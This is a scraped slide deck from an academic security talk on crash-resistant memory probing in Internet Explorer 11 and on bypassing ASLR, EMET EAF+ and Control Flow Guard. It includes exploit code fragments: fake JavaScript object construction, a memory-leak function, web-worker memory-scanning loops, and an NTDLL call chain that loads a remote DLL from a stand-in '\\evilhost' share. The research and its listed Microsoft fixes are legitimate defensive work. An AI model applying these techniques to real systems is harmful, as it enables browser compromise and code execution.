Bypassing Different Defense Schemes via Crash-Resistant Probing of Address Space

Size: px

Start display at page:

Download "Bypassing Different Defense Schemes via Crash-Resistant Probing of Address Space"

Johnathan McDaniel
6 years ago
Views:

1 Bypassing Different Defense Schemes via Crash-Resistant Probing of Address Space Robert Gawlik Ruhr University Bochum Horst Görtz Institute for IT-Security Bochum, Germany

2 About me Playing with InfoSec since 2010 Currently in academia at Systems Security Horst Görtz Institute / Ruhr University Bochum Focusing on binary analysis / attacks / defenses / static and dynamic analysis Little time for bug hunting and exploiting Fun fact: Recently discovered favorite toy: DynamoRIO

3 Agenda Crash-Resistance Crash-Resistance in IE 32-bit (CVE ) Memory Scanning : Bypass ASLR Export Resolving : Bypass EMET's EAF+ Function Chaining : Bypass Control Flow Guard & EMET's UNC library path restriction Crash-Tolerant Function Dispatching : Fun! Mitigations/Fixes

4 Crash-Resistance

5 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);

6 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);

7 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);

8 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);

9 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); Program should terminate abnormally

10 Crash-Resistance

11 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); Instead: Program runs endlessly

12 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);

13 Crash-Resistance 0:000:x86> g (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86> gn (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86>!exchain [...] 0057f800: USER32!_except_handler4+0 CRT scope 0, filter: USER32!DispatchMessageWorker func: USER32!DispatchMessageWorker+36895

14 Crash-Resistance 0:000:x86> g (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86> gn (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86>!exchain pass exception unhandled [...] 0057f800: USER32!_except_handler4+0 CRT scope 0, filter: USER32!DispatchMessageWorker func: USER32!DispatchMessageWorker+36895

15 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Behind the Scenes (Simplified) DispatchMessage: try { crash() except(filter) { access violation filter returns 1 int main(){ execute handler MSG msg; SetTimer(0, 0, 1, crash); continue execution while(1){ GetMessage(&msg, NULL, 0, 0); return DispatchMessage(&msg);

16 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Behind the Scenes (Simplified) int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); return DispatchMessage(&msg); DispatchMessage: try { crash() except(filter) {

17 Crash-Resistance char* addr = 0; Behind the Scenes (Simplified) void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); If a fault is generated, execution is transferred to the end of the loop Program continues running despite producing faults

18 Crash-Resistance char* addr = 0; Behind the Scenes (Simplified) void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); If a fault is generated, execution is transferred to the end of the loop Program continues running despite producing faults

19 Crash-Resistance DEMO 1

20 Crash-Resistance Similar issues: - Why it's not crashing? [1] - ANI Vulnerability (CVE ) [2] - Escaping VMware Workstation through COM1 (JPEG2000 parsing) [3] - The Art of Leaks (exploit reliability) [4]

21 Crash-Resistance in Internet Explorer 11

22 Crash-Resistance in IE 11 JS callback() set with setinterval() or settimeout() in web worker is crash-resistant: Start worker Launch timed callback() with setinterval() callback() function may produce access violations without forcing IE into termination (a): if an AV is triggered in callback(), then callback() stops running and is executed anew (b): if callback() produces no fault, it is executed completely and then started anew usable as side channel

23 Crashless Memory Scanning in Internet Explorer 11

24 Memory Scanning The Plan: Spray the heap Use vulnerabilty to change a byte Create a type confusion and craft fake JS objects Utilize fake objects in web worker with setinterval() to scan memory in a crash-resistant way Discover Thread Environment Block (TEB) Discover DLL Base Addresses Don't control EIP yet instead: use only JS bypass ASLR

25 Memory Scanning Spray the heap Alternate between Object Arrays and Integer Arrays Object Arrays become aligned to 0xYYYY0000 Integer Arrays become aligned to +f000 +f400 +f800 +fc00 Object Array: ObjArr[0] = new String() // saved as reference; bit 0 never set ObjArr[1] = 4 // integer saved as 9 = 4 << 1 1 Integer Array: IntArr[0] = 4 // saved as 4

26 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable'

27 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b header space 0:036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable'

28 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b first element 0:036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable'

29 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable' IntArr[0] = IntArr[(0x100-0x10 + 4) / 4] = 0x1011f010 0:036> ddp 1011f100 L2 1011f f f

30 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 Why this odd index? (0x100 0x10 + 4) / 4 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable' IntArr[0] = IntArr[(0x100-0x10 + 4) / 4] = 0x1011f010 0:036> ddp 1011f100 L2 1011f f f IntArr is aligned to 0x1011f000 0x10: occupied header space + 0x100: offset to 0x1011f x4: element offset / 0x4: element size We can expect the element to reside at 0x1011f104

31 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned IntArr is aligned to 0x1011f000 int,0>::`vftable' : first element resides at 0x1011f010 IntArr[0] = x10 bytes are taken as IntArr[(0x100-0x10 + 4) / 4] = header 0x1011f010 space 0:036> ddp 1011f100 L2 1011f f f

32 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc Almost! 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable' IE will interpret ObjArr[0] as object IntArr[0] = reference and not as number. IntArr[(0x100-0x10) / 4] = 0x1011f010 Additionally, we control IntArr: We could set all fields of the object referenced by ObjArr[0] 0:036> ddp 1011f100 L2 1011f f f We need to change 01 to 00:

33 Memory Scanning Trigger a vulnerability to change a byte Use a rewriting Use-After-Free [5], e.g., CVE (IE10): OR inc [eax+0x10] eax is attacker controlled possible to change an arbitrary byte and continue execution in JavaScript Single NULL byte write to attacker chosen address create a type confusion (0x1011f101 becomes 1011f100) => ObjArr[0] is interpreted as object

34 Memory Scanning Creating fake JS Objects jscript9!js::literalstring looks like : typedef struct LiteralString_{ /*0x0*/ VOID* vtable_ptr; /*0x4*/ VOID* type_ptr; // points to type object /*0x8*/ UINT len; /*0xc*/ WCHAR* buf; // string content LiteralString; offset = (0x100 0x10) / 4 IntArr[0] = // 0x1011f010 IntArr[offset] = 0x // bogus vtable IntArr[offset + 0x4] = 0x1011f010 // points to type IntArr[offset + 0x8] = 0x2 // length IntArr[offset + 0xc] = 0x // address of content

35 Memory Scanning Creating fake JS Objects fakestring = ObjArr[0] // get object element located at 0x1011f100 leak = escape(fakestring) // leak 0x4 bytes from 0x we have set 0x as vtable ptr, but escape() still works fakestring.substring() does not work vtable lookup AV We can now leak already all the things! function leak(addr){ intarr[offset + 0xc] = addr return to_dword(unescape(escape(objarr[0])))

36 Memory Scanning Creating fake JS Objects Example: leak vtable ptr and type ptr to sanitize fakestring ObjArr[1] = bla // create LiteralString 0x ) str_addr = leak(0x ) str_vtable_ptr = leak(str_addr) str_type_ptr = leak(str_addr + 4) IntArr[offset] = str_vtable_ptr // give fakestring a real vptr! IntArr[offset + 4] = str_type_ptr // real type ptr! fakestring.substring() should work now :) We can build arbitrary JS objects if we know their structure We don't have a write-what-where interface yet Build your own Uint32Array() to RW complete memory

37 Memory Scanning Creating fake JS Objects Exercise: Build your own Uint32Array() Inaccurate hint: typedef struct Uint32Array_{ /*0x00*/ VOID* vtable_ptr; /*0x04*/ VOID* type_ptr; /*0x08*/ INT NULL; /*0x0c*/ INT NULL; /*0x10*/ VOID* arraybufferobjectptr; // can be unset /*0x14*/ INT elemsize; // 4 /*0x18*/ INT arraybufferoffset; /*0x1c*/ INT nrelements; // 0x7fffffff/4 /*0x20*/ VOID* bufferptr; // set to 0 /*0x24*/ INT NULL; /*0x28*/ INT NULL; /*0x2c*/ INT NULL; Uint32Array;

38 Memory Scanning Crash-Resistant Scanning Where are we now? We have fake String and Typed Array objects usable to read and write the address space arbitrary information leak arbitrary memory write Use fake objects for crash-resistant scanning

39 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block 0:020>!teb TEB at 7f :020> dt ntdll!_teb 7f /b +0x000 NtTib : _NT_TIB +0x000 ExceptionList : 0x03e0f8cc +0x004 StackBase : 0x03e x008 StackLimit : 0x03e0c x018 Self : 0x7f :020> dt ntdll!_teb 7f x030 ProcessEnvironmentBlock : 0x7f15f000 _PEB TEB == [TEB + 0x18] && [TEB + 4] > [TEB] > [TEB + 8]?

40 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block 0:020>!teb TEB at 7f :020> dt ntdll!_teb 7f /b +0x000 NtTib : _NT_TIB +0x000 ExceptionList : 0x03e0f8cc +0x004 StackBase : 0x03e x008 StackLimit : 0x03e0c x018 Self : 0x7f Heuristic yields TEB if we read at the right place Afterwards, PEB can be resolved 0:020> dt ntdll!_teb 7f x030 ProcessEnvironmentBlock : 0x7f15f000 _PEB Normally we cannot leak the TEB as no references exist to it TEB == [TEB + 0x18] && [TEB + 4] > [TEB] > [TEB + 8]?

41 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */

42 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant

43 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant set address to probe

44 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant set address to probe leak() creates implicit flow: if addr!= mapped: return

45 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant set address to probe leak() creates implicit flow: if addr!= mapped: return use heuristic to discover TEB and leak PEB + LdrData

46 Memory Scanning Crash-Resistant Scanning Discover a Thread-Environment Block

47 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */

48 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant

49 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment)

50 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment) get leak or return

51 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment) get leak or return if leak() succeeds check for MZ and PE header (ispe())

52 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment) get leak or return if leak() succeeds check for MZ and PE header (ispe()) leak more memory: name of module size of module

53 Memory Scanning DEMO 2

54 Resolve Exports under EMET

55 Export Resolving Resolve Exports under EMET 5.2 EAF and EAF+

56 Export Resolving Resolve Exports under EMET EAF and EAF+ EAF: Forbit accesses to Export Address Table based on calling code (shellcode) EAF+: Block read accesses to Export Address Table originating from certain modules EMET's max. security setting for IE (blacklist): mshtml.dll; flash*.ocx; jscript*.dll; vbscript.dll; vgx.dll can we abuse reads originating from non-blacklisted modules using only JS (no control-flow hijacking)?

57 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size escape(fakestring) copies the DLL for you! escape used msvcrt!fastcopy_i (msvcrt.dll is not blacklisted) - Worked with large strings but in recent tests it stopped working (fixed?)

58 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size escape(fakestring) copies the DLL for you! escape used msvcrt!fastcopy_i (msvcrt.dll is not blacklisted)?! - Worked with large strings but in recent tests it stopped working!!!!!! (fixed?, drunk?)

Export Resolving Resolve Exports under EMET5.5 5.2 EAF and EAF+ Yes we can!

59 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size There is something better: escape(fakestring) copies the DLL for you! Use the Blob! escape used msvcrt!fastcopy_i (msvcrt.dll is not blacklisted) - worked with large strings but in recent tests it stopped working!!!!!! (fixed?, drunk?)

60 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size Create a Blob of the fakestring object blob = new Blob([fakeString], {type:"application/octet-stream") url = URL.createObjectURL(blob) 0:024> kp n # ChildEBP RetAddr bed ntdll!countunicodetoutf8+0x bed38 774ac7fb ntdll!rtlunicodetoutf8n+0xf bed a KERNELBASE!WideCharToMultiByte+0x bedd f MSHTML!CBlobBuilder::AppendData+0x bee28 72f415e1 MSHTML!CBlobBuilder::ConstructBlob+0x2c bee50 714e0fb6 MSHTML!CFastDOM::CBlob::DefaultEntryPoint+0x61

61 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size Create a Blob of the fakestring object blob = new Blob([fakeString], {type:"application/octet-stream") url = URL.createObjectURL(blob) 0:024> kp n # ChildEBP RetAddr bed ntdll!countunicodetoutf8+0x bed38 774ac7fb ntdll!rtlunicodetoutf8n+0xf4 Not blacklisted bed a KERNELBASE!WideCharToMultiByte+0x269 by EAF bedd f MSHTML!CBlobBuilder::AppendData+0x bee28 72f415e1 MSHTML!CBlobBuilder::ConstructBlob+0x2c bee50 714e0fb6 MSHTML!CFastDOM::CBlob::DefaultEntryPoint+0x61

62 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size Create a Blob of the fakestring object Use XMLHttpRequest to retrieve a string copy of the module Resolve exports within the string copy: PE = to_dword(dll.substring(0x3c/2, 0x3c/2 + 2)) p_exp = PE + 0x18 + 0x60 ExportDir = to_dword(dll.substring(p_exp/2, p_exp/2 + 2)...

63 Export Resolving DEMO 3

64 Function Chaining

65 Function Chaining Staying under the radar of Control Flow Guard (CFG) CFG protects indirect calls Exported functions are allowed, but not all Control Flow Hijacking: trigger virtual function call with a method of fakestring: IntArr[offset] = fakevtable fakestring = ObjArr[0] fakestring.whatever() // bogus vtable ptr push fakestring mov eax, [fakestring] call [eax + x] // Arg1: controlled content // get vtable ptr // controlled target

66 Function Chaining Staying under the radar of Control Flow Guard (CFG) Idea: (1) Collect export functions which have indirect calls (2) Check if indirect call target is a field of first argument (3) Check if parameters for indirect call target are influenced by arguments Fields of controlled object (first argument) get propagated to parameters before indirect call chain functions Last function in chain is the function we want to perform our operation

67 Function Chaining Staying under the radar of Control Flow Guard (CFG) Example function chain: push fakestring // controlled content mov eax, [fakestring] // get vtable ptr call [eax + 0x20] // fake virtual function (func1) func1(fakestring):... push [fakestring + 0x10] push [fakestring + 0x04] push fakestring call [fakestring + 0x08] // = arg3 // = arg2 // = arg1 // = func2 func2(arg1, arg2, arg3):... push arg2 // = [fakestring + 0x04] = CONTEXT* push arg3 // = [fakestring + 0x10] = HANDLE call [arg1 + 0x0c] // = [fakestring + 0x0c] = SetThreadContext

68 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI

69 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c]

70 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX

71 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX Param1 = Arg1

72 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX Param1 = Arg1 EAX = Arg3 ECX = EAX + 0x10 Param2 = ECX

73 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX Param1 = Arg1 EAX = Arg3 ECX = EAX + 0x10 Param2 = ECX Param2 = Arg3 + 0x10

74 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : Simple Propagation Summary: EIP = [Arg1 + 0x2c] Param1 = Arg1 Param2 = Arg3 + 0x10

75 Function Chaining Staying under the radar of Control Flow Guard (CFG) Load arbitrary remote DLLs under EMET: Chain of five NTDLL functions (Win 8.1 only): RtlLookupElementGenericTableFullAvl (1) RtlInsertElementGenericTableFullAvl (2) RtlLookupElementGenericTableFull (3) RtlTraceDatabaseFind (4) LdrInitShimEngineDynamic (5) Execute callchain : Two controlled parameters LdrInitShimEngineDynamic([fakeStr + 0x8] + 0x20, [fakestr] + 0x18) Param1 has to be within a module's bounds Param2: pointer to remote DLL: \\evilhost\exploit.dll

76 Crash-Resistant Export Dispatching

77 Crash-Resistant Export Dispatching Combining Function Chaining and Crash-Resistance Function chain allows dispatching exports with max. two parameters MoveFileA(STR, STR) NtGetContextThread(HANDLE, CONTEXT)... After execution of last function in chain an AV is thrown Catched when AV happens within callback() of setinterval()! Possibility to subsequently execute several function chains: MoveFileA() + LoadLibrary() two chains NtGetContextThread() + NtContinue() two chains WinExec() + WinExec() + WinExec() three chains :)

78 Crash-Resistant Export Dispatching DEMO 4

79 Crash-Resistant Export Dispatching Executing arbitrary exports without Shellcode, ROP or JIT (1) Get ESP with NtGetContextThread as last function in chain (2) Prepare fake object with CONTEXT for NtContinue: set EIP to wanted exported function (e.g., system call) set ESP to free stack space (3) Prepare free stack space: write parameters for exported function set return address for exported function to NULL (4) Use virtual function call to launch NtContinue on indirect call site in crash-resistant mode (5) Read return data of system call and proceed to step (2)

80 Crash-Resistant Export Dispatching Executing arbitrary exports without Shellcode, ROP or JIT (1) Get ESP with NtGetContextThread as last function in chain (2) Prepare fake object with CONTEXT for NtContinue: set EIP to wanted TNX exported to Yang function Yu for (e.g., system call) set ESP to free the stack NtContinue space Trick [5]! (3) Prepare free stack space: write parameters for exported function set return address for exported function to NULL (4) Use virtual function call to launch NtContinue on indirect call site in crash-resistant mode (5) Read return data of system call and proceed to step (2)

81 Mitigations

82 Mitigations Fixes and Feedback by Microsoft user32 exception handing hardening feature addresses Internet Explorer 7-11 (MS15-124) [8] Crash-Resistant issue fixed in MS Edge (MS15-125) [9] Control Flow Guard is becoming more fine-grained with each Windows version: NtContinue is no valid indirect call target in Windows10 RTM Code Integrity in MS Edge: - block loading of arbitrary libraries - block child process creation (Windows 10 Insider Preview)

83 Q & A robert.gawlik@rub.de

84 References [1] [2] [3] [4] Art of Leaks - read version - Yoyo.pdf [5] [6] [7] [8] [9]

Undermining Information Hiding (And What to do About it)

Undermining Information Hiding (And What to do About it) Enes Göktaş, Robert Gawlik, Benjamin Kollenda, Elias Athanasopoulos, Georgios Portokalidis, Cristiano Giuffrida, Herbert Bos Overview Mitigating